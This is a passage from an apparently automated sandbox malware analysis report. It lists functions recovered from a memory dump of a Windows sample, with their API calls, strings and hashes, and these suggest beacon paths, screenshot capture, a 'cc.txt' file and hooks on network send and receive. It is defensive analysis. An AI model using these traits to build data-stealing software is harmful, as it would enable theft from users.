                                                                                                                                                                                                                • Part of subcall function 012E6C70: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 012E6D81
                                                                                                                                                                                                                • Part of subcall function 012E6C70: memset.MSVCRT(00000000,00000000,00000110,?,?,?,?,?,00000000), ref: 012E6D95
                                                                                                                                                                                                                • Part of subcall function 012E6C70: lstrcpynA.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,00000000), ref: 012E6DAE
                                                                                                                                                                                                                • Part of subcall function 012E6C70: RegCloseKey.ADVAPI32(?,?,?,?,?,?,00000000), ref: 012E6DBC
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,?,774D0F00,00000000,00000000), ref: 012F38BB
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,?,774D0F00,00000000,00000000), ref: 012F38C2
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,?,774D0F00,00000000,00000000), ref: 012F38CE
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,774D0F00,00000000,00000000), ref: 012F38D5
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000,00000001,00000000,00000000,/topic.php,?,00000001,00000001,00000000,00000000,00000001,?,?,?,774D0F00), ref: 012F394D
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?,?,?,?,774D0F00,00000000,00000000), ref: 012F395A
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,774D0F00,00000000,00000000), ref: 012F3998
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,?,774D0F00,00000000,00000000), ref: 012F399B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,774D0F00,00000000,00000000), ref: 012F39A7
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,774D0F00,00000000,00000000), ref: 012F39AA
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Processmemset$File$FreeTempValidate$AllocAttributesCloseDeleteNameOpenPathQueryValuelstrcpyn
                                                                                                                                                                                                              • String ID: /topic.php
                                                                                                                                                                                                              • API String ID: 870369024-224703247
                                                                                                                                                                                                              • Opcode ID: 914d3648405e3c914f56e459b6ec6057c2f334a21325c03cafd31b3e86dc084a
                                                                                                                                                                                                              • Instruction ID: c98010562b27ba472a495ad13705336bff1d14092d90a28dd20eeb4823c4269d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 914d3648405e3c914f56e459b6ec6057c2f334a21325c03cafd31b3e86dc084a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7251F4B2950119ABDB31EEB89C88EEBBFACFB55300F0445ADF745D6140D6758A84CBA0
                                                                                                                                                                                                              Function 012FA1B0 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 130filethreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 012FA1CA
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?), ref: 012FA1D7
                                                                                                                                                                                                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 012FA1F4
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,012F9E40,?,00000000,00000000,00000000,00000000), ref: 012FA23E
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 012FA256
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012FA267
                                                                                                                                                                                                              • GetTempPathA.KERNEL32(00000104,?), ref: 012FA279
                                                                                                                                                                                                              • GetTempFileNameA.KERNEL32(?,00000000,00000000,?), ref: 012FA291
                                                                                                                                                                                                              • _snprintf.MSVCRT(?,00000104,name=%s&port=%u,%53%59%53%54%45%4D%21%38%34%31%36%31%38%21%30%32%35%46%39%30%34%39,?), ref: 012FA2B1
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000,00000000,/home.php,?,00000001,?,?,00000001,00000000), ref: 012FA327
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 012FA334
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$HandleInformationPathTemp$AttributesBackslashCloseCreateDeleteEnvironmentNameThreadVariableVolume_snprintf
                                                                                                                                                                                                              • String ID: %53%59%53%54%45%4D%21%38%34%31%36%31%38%21%30%32%35%46%39%30%34%39$/home.php$SystemDrive$name=%s&port=%u
                                                                                                                                                                                                              • API String ID: 1291007772-2359251745
                                                                                                                                                                                                              • Opcode ID: 39e10a796938384bb562367dcb7040feda8e8f40191b40735f7a05c2eebc8848
                                                                                                                                                                                                              • Instruction ID: de8996142c9437e7813e53d2cce6981bbe9bbf0ac8459809634b7c93a2c38e16
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 39e10a796938384bb562367dcb7040feda8e8f40191b40735f7a05c2eebc8848
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 154162716503196BEB34EB64CC49FFAB77D9B45705F0041ACFB05A6184EAF19A848B60
                                                                                                                                                                                                              Function 01303340 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 106sleepCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0133CF94), ref: 01303367
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 013033A9
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 013033B5
                                                                                                                                                                                                              • #680.SHELL32 ref: 013033B9
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 013033CA
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 013033D1
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 01303402
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 01303408
                                                                                                                                                                                                              • #680.SHELL32 ref: 0130340C
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 0130341D
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 01303424
                                                                                                                                                                                                              • _snprintf.MSVCRT(?,00000104,%s\%02d.bmp,?,00000001), ref: 01303452
                                                                                                                                                                                                              • Sleep.KERNEL32(00000FA0,?), ref: 01303468
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$Path$#680CreateDirectoryFolderMakeSystem$BackslashSleep_snprintf
                                                                                                                                                                                                              • String ID: %s\%02d.bmp$scrs
                                                                                                                                                                                                              • API String ID: 3389723127-1670482240
                                                                                                                                                                                                              • Opcode ID: c999d869e8b7ffb1bfa60c3fd5ac183672e0cc4f3db00158695be1d93e9aed4f
                                                                                                                                                                                                              • Instruction ID: a76cc9145e35d27bc4a3f7800753ce75f520831dd9740349b89d1e052fff7222
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c999d869e8b7ffb1bfa60c3fd5ac183672e0cc4f3db00158695be1d93e9aed4f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C3310A315042195FDB32EF799CA8BEABBECBF55704F544098E985D3244DEB0D984CBA0
                                                                                                                                                                                                              Function 012FE580 Relevance: 26.3, APIs: 13, Strings: 2, Instructions: 98memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61c5c031), ref: 012FE5B0
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61c5c031), ref: 012FE5ED
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 012FE602
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 012FE60C
                                                                                                                                                                                                              • #680.SHELL32 ref: 012FE614
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 012FE625
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 012FE62C
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 012FE639
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61c5c031,?,?), ref: 012FE661
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,61c5c031,0132A2F8), ref: 012FE67F
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012FE682
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012FE68F
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012FE692
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HeapPath$Backslash$DirectoryErrorLastProcess$#680CreateCurrentFolderFreeMakeSystemValidate
                                                                                                                                                                                                              • String ID: 61c5c031$cc.txt
                                                                                                                                                                                                              • API String ID: 3733170206-123849419
                                                                                                                                                                                                              • Opcode ID: 2a8f13b2d7e1fcf6a45ef09ee64f2b03d15478592c73d1736383b335fbd74a2b
                                                                                                                                                                                                              • Instruction ID: cbba9fb06eb940810127dcb47c7dfdd7062f79168b8f081f69712502520d2a60
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2a8f13b2d7e1fcf6a45ef09ee64f2b03d15478592c73d1736383b335fbd74a2b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D831E231A003169BD731AB795C5CBEABB98FF95701F05446CFB85D7200EA70960487A4
                                                                                                                                                                                                              Function 013031D8 Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 56sleepsynchronizationthreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}), ref: 013031EC
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 013031FD
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 01303211
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0130321F
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00023080,00000000,00000000,00000000), ref: 01303234
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40), ref: 01303245
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0130324A
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 0130325E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0130326C
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C435), ref: 01303277
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,61C5C435,RFK), ref: 01303291
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 0130329A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$Sleep$CloseInformationMutex$BackslashCreateObjectOpenPathReleaseSingleThreadWait
                                                                                                                                                                                                              • String ID: 61C5C435$Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}$P0Mw$RFK
                                                                                                                                                                                                              • API String ID: 505831200-2085081953
                                                                                                                                                                                                              • Opcode ID: 11a37892dd1730c1e696e7c214f6bb68d3e59604229b0ea3641e5d7f2276642a
                                                                                                                                                                                                              • Instruction ID: 1473878834c039f5de6c8778abdb647e7b23c4af7bb4776505bfc35662cf125d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 11a37892dd1730c1e696e7c214f6bb68d3e59604229b0ea3641e5d7f2276642a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B711E5302863127FE2326B649C1AF5F7ADC7F46B19F00810CFA55A11C4CBB49505CB66
                                                                                                                                                                                                              Function 012EA250 Relevance: 25.9, APIs: 17, Instructions: 354windowthreadtimeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetAncestor.USER32(00000000,00000002,00000080,?,00000000), ref: 012EA25E
                                                                                                                                                                                                                • Part of subcall function 012EE250: GetWindowLongA.USER32(012ECE3A,000000F0,7707BCB0,7707BCB0,00000000), ref: 012EE26B
                                                                                                                                                                                                                • Part of subcall function 012EE250: GetLastActivePopup.USER32(012ECE3A,?,?,?,?,?,?,?,?,?,?,?,?,?,012ECE3A,7707BCB0), ref: 012EE279
                                                                                                                                                                                                                • Part of subcall function 012EE250: GetWindow.USER32(?,00000005,00000001), ref: 012EE293
                                                                                                                                                                                                                • Part of subcall function 012EE250: GetWindow.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,012ECE3A,7707BCB0), ref: 012EE296
                                                                                                                                                                                                                • Part of subcall function 012EE250: GetWindowInfo.USER32(00000000,?), ref: 012EE2AC
                                                                                                                                                                                                                • Part of subcall function 012EE250: GetWindow.USER32(00000000,00000004), ref: 012EE2B5
                                                                                                                                                                                                                • Part of subcall function 012EE250: GetWindow.USER32(00000000,00000003), ref: 012EE2EE
                                                                                                                                                                                                              • SendMessageA.USER32(?,00000010,00000000,00000000,00000000), ref: 012EA29F
                                                                                                                                                                                                              • GetAncestor.USER32(00000000,00000002,00000000), ref: 012EA325
                                                                                                                                                                                                              • SendMessageTimeoutA.USER32(00000000,00000021,00000000,00000001,00000002,00000064,?,00000000), ref: 012EA34C
                                                                                                                                                                                                              • PostMessageA.USER32(00000000,00000020,00000000,00000001,00000000), ref: 012EA391
                                                                                                                                                                                                              • PostMessageA.USER32(00000000,00000000,00000000,00000001,?,00000000), ref: 012EA3E5
                                                                                                                                                                                                                • Part of subcall function 012EA100: GetTickCount.KERNEL32(00000000,77063610,00000000,?,012EA417,00000000), ref: 012EA18A
                                                                                                                                                                                                                • Part of subcall function 012EA100: GetClassLongA.USER32(00000000,000000E6,?,012EA417,00000000), ref: 012EA1DD
                                                                                                                                                                                                              • PostMessageA.USER32(00000000,00000112,?,?), ref: 012EA44E
                                                                                                                                                                                                              • PostMessageA.USER32(00000000,0000007B,00000000,?), ref: 012EA479
                                                                                                                                                                                                              • PostMessageA.USER32(00000000,0000007B,00000000,00000000,00000000,?), ref: 012EA4F5
                                                                                                                                                                                                              • GetSystemMenu.USER32(00000000,00000000), ref: 012EA514
                                                                                                                                                                                                              • GetMenuItemInfoA.USER32(00000000,0000F060,00000000,0000004C), ref: 012EA538
                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(?,00000000,00000000,00000001,?,?,012E9523,00008001,?,00000000,00000000), ref: 012EA5A3
                                                                                                                                                                                                              • PostMessageA.USER32(00000000,00000000,00000000,00000000,00000000,?), ref: 012EA5B6
                                                                                                                                                                                                              • PostMessageA.USER32(?,?,00000001,00000000,?,?,?,?,?,?,?,?,012E9523,00008001,?,00000000), ref: 012EA5D9
                                                                                                                                                                                                              • PostMessageA.USER32(?,?,00000002,00000000,?,?,?,?,?,?,?,?,012E9523,00008001,?,00000000), ref: 012EA5FB
                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(00000000,00000000,00000001,00000001,00000000,?), ref: 012EA633
                                                                                                                                                                                                              • GetWindowThreadProcessId.USER32(?,00000000,00000080,00000001,?,00000112,?,00000000), ref: 012EA65D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Message$Window$Post$ProcessThread$AncestorInfoLongMenuSend$ActiveClassCountItemLastPopupSystemTickTimeout
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 590198697-0
                                                                                                                                                                                                              • Opcode ID: ca9e02c3924f469522014a735ad8fe92f80bcdea479de6df42369bd461799bdf
                                                                                                                                                                                                              • Instruction ID: b26959d6238f53ff83fbcd9c558688a8f6cf684714ae9d0c511ae83f9960a3d4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ca9e02c3924f469522014a735ad8fe92f80bcdea479de6df42369bd461799bdf
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 18B15B32B2021656FB31AE1CE88DBBE77D8D781711F94403AFF05E7181C7A9C85597A1
                                                                                                                                                                                                              Function 012E9020 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 132memorythreadwindowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetThreadDesktop.USER32(?,774CF590,774C16B0,?), ref: 012E902F
                                                                                                                                                                                                              • GetDC.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,012EDA97), ref: 012E9037
                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000000A,?,?,?,?,?,?,?,?,?,?,?,?,012EDA97), ref: 012E9048
                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,00000008,?,?,?,?,?,?,?,?,?,?,?,?,012EDA97), ref: 012E9059
                                                                                                                                                                                                              • CreateCompatibleBitmap.GDI32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,012EDA97), ref: 012E9070
                                                                                                                                                                                                              • GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 012E90B2
                                                                                                                                                                                                              • GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,00000028,00000000), ref: 012E90C2
                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 012E90C5
                                                                                                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 012E90CE
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000,?), ref: 012E9129
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 012E9142
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 012E915F
                                                                                                                                                                                                              • SetThreadDesktop.USER32(?), ref: 012E9194
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocBitsCapsDesktopDeviceThread$BitmapCompatibleCreateDeleteFreeObjectRelease
                                                                                                                                                                                                              • String ID: (
                                                                                                                                                                                                              • API String ID: 188880187-3887548279
                                                                                                                                                                                                              • Opcode ID: b3e7f0b65f4730870b139af66e3e399a428e0d731ae6808cc5e8bc297ae9abdb
                                                                                                                                                                                                              • Instruction ID: d7303bbbf6be9c4be6b5a76d7675b7bf1bbf8fc0443d4978440e44fc85cb8d04
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b3e7f0b65f4730870b139af66e3e399a428e0d731ae6808cc5e8bc297ae9abdb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 08415B71A01304AFDB20EFA8D889FEA7BFCEB49310F14412DE608E7284D6755901CBA4
                                                                                                                                                                                                              Function 012F9820 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 65libraryloaderCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(advapi32.dll,00000000,00000000,774CF550,774CDF10,012F598B), ref: 012F9831
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CryptEncrypt), ref: 012F9843
                                                                                                                                                                                                                • Part of subcall function 012FA540: VirtualAlloc.KERNEL32(00000000,-00000008,00003000,00000040,774CF550,00000000,7706BD50,?,?,?,012F98DA,00000000,012F9730,0133A04C), ref: 012FA578
                                                                                                                                                                                                                • Part of subcall function 012FA540: memcpy.MSVCRT(?,?,00000000,?,?,?,012F98DA,00000000,012F9730,0133A04C), ref: 012FA5A0
                                                                                                                                                                                                                • Part of subcall function 012FA540: VirtualProtect.KERNEL32(00000000,?,00000040,012F98DA,?,?,?,?,?,?,012F98DA,00000000,012F9730,0133A04C), ref: 012FA635
                                                                                                                                                                                                                • Part of subcall function 012FA540: VirtualProtect.KERNEL32(?,00000000,00000040,012F98DA,?,?,?,?,?,?,012F98DA,00000000,012F9730,0133A04C), ref: 012FA64A
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(ws2_32.dll,00000000,00000000), ref: 012F9862
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,send), ref: 012F9870
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,WSASend), ref: 012F988C
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,WSARecv), ref: 012F98A8
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,recv), ref: 012F98C4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressProc$Virtual$LibraryLoadProtect$Allocmemcpy
                                                                                                                                                                                                              • String ID: CryptEncrypt$WSARecv$WSASend$advapi32.dll$recv$send$ws2_32.dll
                                                                                                                                                                                                              • API String ID: 1216545827-2206184491
                                                                                                                                                                                                              • Opcode ID: bbecd8e9610b6b671d259cd84a127d6d456b8bc51638727ef1305598063692ca
                                                                                                                                                                                                              • Instruction ID: 8cb2373c6c8c21862418f937aeaa2d019d3d5e61b5610fe6442ea3a944ccb8e7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bbecd8e9610b6b671d259cd84a127d6d456b8bc51638727ef1305598063692ca
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5501E571BA133270EE20367B1D0AF6B954C1FA5D4CF15013DFB08F6284EA99E5858ABC
                                                                                                                                                                                                              Function 013019A0 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 56sleepsynchronizationthreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}), ref: 013019CC
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 013019D9
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 013019ED
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 013019FF
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_000217D0,00000000,00000000,00000000), ref: 01301A10
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 01301A1F
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 01301A26
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61c5c310), ref: 01301A2D
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,61c5c310,KBP), ref: 01301A47
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 01301A50
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$CloseMutexSleep$BackslashCreateInformationObjectOpenPathReleaseSingleThreadWait
                                                                                                                                                                                                              • String ID: 61c5c310$KBP$Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}$P0Mw
                                                                                                                                                                                                              • API String ID: 4173420962-834708227
                                                                                                                                                                                                              • Opcode ID: 6efd3d85c44f88f64b10f2e36df948f6549bf2fa54ec403b29008e15d71c6ed9
                                                                                                                                                                                                              • Instruction ID: 58a271af20a24cd5c2fdf8515bebef3eafbceceab627287612ad732db23c2957
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6efd3d85c44f88f64b10f2e36df948f6549bf2fa54ec403b29008e15d71c6ed9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BB01D6316867157BE2327B654C1AF9E76DC6F46F69F150108F610762C4DBE0EA0087EA
                                                                                                                                                                                                              Function 0130C8D0 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 298COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
